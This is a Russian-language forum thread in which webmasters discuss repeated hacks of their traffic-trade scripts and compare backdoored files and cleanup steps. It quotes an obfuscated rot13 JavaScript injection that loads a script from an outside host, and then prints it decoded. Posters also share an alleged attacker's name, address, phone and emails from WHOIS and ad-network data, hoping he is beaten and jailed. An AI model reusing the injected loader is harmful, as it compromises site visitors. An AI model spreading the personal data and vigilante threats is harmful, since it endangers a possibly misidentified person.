Киргизский Хакер и взломы TP

X-dream, в этом файле прописываешь, с каких IP разрешено к тебе на сайт по FTP ходить. У меня, например, на хостинге прописано разрешение ходить по FTP только с моего домашнего компа и с наладонника. Так что, даже если у меня все пароли от FTP попиздят, то всё равно обломятся зайти.

У меня этот файл лежит в корне хостинга и имеет довольно простенький формат - разрешать заходить по FTP только мне:

Код:

<Limit ALL> Allow from 123.112.221.223 Allow from 111.222.23.12 Deny from all </Limit>

Дока по формату - здесь: http://peterhost.ru/wiki/.ftpaccess/

Хмм... Саппорт у TrafficRevenue.net оказался вполне вменяемым.
Я с них хочу компенсацию 1200 получить(товарищ говорит что я дурак и надо было сразу 100к предьявлять им) но потратил я 1200 уже и пусть все будет честно .
Сказали что за всех своих 25000 адвертов не могут отвечать, но именно этого хакера забанят, дадут мне его данные + мыло пейпала если оно есть, а то что он успел на моих сайтах заработать заплатят мне .....слабо верится что заплатят... да и похрен деньги....хочу наказать гандона, хоть както.

через TP могли ломануть, проверь файл tpupdater.php должен быть около 15кб, если меньше в два раза, значит он.

remote_updater.php
filter.php
updater.php
tpupdater.php - 5kb
tools.php
vtop.php

вот эти все хакнуты. да и много еще файлов и пхп и хтмл

хм... из последних скриптов ставил FREE TP Version 1.0.8 build 43

это один пидор с Киргизии ломает, слушай, если тебе дадут его данные, скинь мне их в личку плиз. и пиши kildoozer@scriptpulse.com, он знает что делать

eVan писал:

это один пидор с Киргизии ломает

хмм жду ответа от трафревеню...

а почему думаеш что один и тот же чел? на прошлые взломы тп ставили теже коды?

да мы уже с ним месяца 3 точно бодаемся, тут вот топек на эту тему есть http://forum.scriptpulse.com/index.php/topic,1455.0.html
если есть возможность, то можно у хостеров логи посмотреть, с какого ip файлы менялись, у нас всегда с киргизского, и сам суппорт TP его уже хорошо знает, только никак адрес вычислить не может.

гы. пока саппорт дримхоста отвечает на тикет уже восьмой час мне почистили и уже перенесли все сайты на дедик осталось только днс сменить...

хз где дыра. от тп наверно придется временно отказатся.

есть подозрение, что переезд на дедик не поможет, т.к. бэкдоры рассованы по файлам, которые тоже переедут, и начнется по новой

Берем свежую версию с офф сайта(если конечно сам офф сайт не взломан) сравниваем все файлъй и чистимся.Бабло приятно зарабатъвать,а вот платить за security никто не хочет.Прикольно.

eVan писал:

это один пидор с Киргизии ломает, слушай, если тебе дадут его данные, скинь мне их в личку плиз. и пиши kildoozer@scriptpulse.com, он знает что делать

Есть данные этого васи. И адрес и номер телефона. И мыло пейпала. Наверно данные левые, но то что есть...

Скинул в ЛС

Надеюсь его жестоко отпиздят и посадят.

зы - сюда запостить или не надо?

Ха парни читаю тему и вижу ту же ситуацию что была год назад у меня и у других в топлистах. кому интересно найдите тему про взлом гб топов. да этот чертыла с киргизии его айпи я в тех темах светил. переезд не помогает. я все заново восстанавливал и сиджи и топы. тк код был везде и бекап восстанавливать бесполезно.

CrazyMen: это пиздец )) реально все вернулось... сцука.

TP которые на дедике не пострадали причем не обновлял их уже больше года, но там по ип закрыто и фаервол стоит.

а все что на дримхосте

если все TP снесу (через ssh всю папку) то дыра исчезнет?

Цитата:

если все TP снесу (через ssh всю папку) то дыра исчезнет?

Ага и есчо ТР исчезнет.
Почекай как я тебе вверху написал и вижу что по ИП уже закръл.

pexli писал:

Ага и есчо ТР исчезнет

ну это не критично, два, три сайта могут потерпеть без трейда. уже снес. сейчас wp обновляю, вроде помогает...

главное чтоб гугл не заметил и что дыра не в wp я надеюсь, а с секьюрити разберусь...

WP софт х***й.
Лишних плагинов не ставить.
Админку по .htaccess закръть для посторонних
Upload и правка файлов через админку запретить.Все через фтп.

Я три раза все сносил и ставил заново. не помогло. код был прописан даже в тумбах я нашел только один выход от сюда - начать все с нуля. восстановил дизы дески пикчи нарезал снова... я тогда думал что брошу все после того как третий раз все восстанавливал, но потом все же нашел в себе силы восстановить пусть не все но хотя бы часть

X-dream: а можешь сделать список плагинов и тем которые есть на блогах?
в самом вп редко баги серьезные бывают

X-dream у меня на ТР скрипте старой версии (того года), показывались поп ап окна, какой то рекламы и только, для американ айпи, в следствии чего траф подсел в раза два, но исправил ситуацию путем обновления до последний версии скрипта, а так же заказывал сторонюю поддержку, через шелл, на предмет выявления вирусов, и т.п. у софт кома! Вот так.. : )

Сейчас переношу с фрихостов купленные сайты так тоже обнаружил похожий код на сайтах

Код: [развернуть]

<script language="JavaScript" type="text/javascript">function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26);})}document.write(rot13("<fpevcg ynathntr=\"wninfpevcg\" fep=\"uggc://jjj.nyynop.pbz/vaqrk.cuc?ers=pbqr\"></fpevcg>"));</script>

а вот куда ведет он после расшифровки :

Код: [развернуть]

<script src="http://www.allabc.com/index.php?ref=code" language="javascript"/>

Парни вы ищите как он вас проломил, через что желательно. если сломали вас значит сломали и других. Отпишите овнерам скриптов что произшло и как быстрее это исправить иначе просто пистец настанет массовый. Если у кого ip хацкера есть скиньте плиз сравню он не он

Блять! Это нахуй эпидемия...

хуйня война...что не убивает - делает сильнее!

Цитата:

Цитата: Hello. Let me follow you up on this. Here are account details: Email: webex.post@gmail.com PayPal email: nexxxen@gmail.com What we have done: 1. The account "inj" has been banned. 2. All payments are blocked. 3. No ads for account "inj" will be displayed I am also exchanging informations with another affected webmaster. His email is kildoozer@gmail.com and his servers were hacked as well. You may want to contact him to cooperate(he allowed me to provide you his email). Finally, by googling his email, I might have been able to get additional details of the attacker: http://xml.ssdsandbox.net/dnslookup-dnsdb/xtds.in. Best regards, Tomasz Klekot TrafficRevenue

Цитата:

Domain ID:D4085859-AFIN Domain Name:XTDS.IN Created On:11-Mar-2010 11:58:54 UTC Last Updated On:07-Feb-2012 21:15:13 UTC Expiration Date:11-Mar-2013 11:58:54 UTC Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN) Status:CLIENT TRANSFER PROHIBITED Registrant ID:TS_11767501 Registrant Name:George Weber Registrant Organization:N/A Registrant Street1:Chuyskaya, 213 Registrant Street2: Registrant Street3: Registrant City:Osh Registrant State/Province:Osh Registrant Postal Code:720000 Registrant Country:KG Registrant Phone:+996.502560888 Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant Email:webex.post@gmail.com Admin ID:TS_11767501 Admin Name:George Weber Admin Organization:N/A Admin Street1:Chuyskaya, 213 Admin Street2: Admin Street3: Admin City:Osh Admin State/Province:Osh Admin Postal Code:720000 Admin Country:KG Admin Phone:+996.502560888 Admin Phone Ext.: Admin FAX: Admin FAX Ext.: Admin Email:webex.post@gmail.com Tech ID:TS_11767501 Tech Name:George Weber Tech Organization:N/A Tech Street1:Chuyskaya, 213 Tech Street2: Tech Street3: Tech City:Osh Tech State/Province:Osh Tech Postal Code:720000 Tech Country:KG Tech Phone:+996.502560888 Tech Phone Ext.: Tech FAX: Tech FAX Ext.: Tech Email:webex.post@gmail.com Name Server:GETNIC.MERCURY.ORDERBOX-DNS.COM Name Server:GETNIC.VENUS.ORDERBOX-DNS.COM Name Server:GETNIC.EARTH.ORDERBOX-DNS.COM Name Server:GETNIC.MARS.ORDERBOX-DNS.COM Name Server: Name Server: Name Server: Name Server: Name Server: Name Server: Name Server: Name Server: Name Server: DNSSEC:Unsigned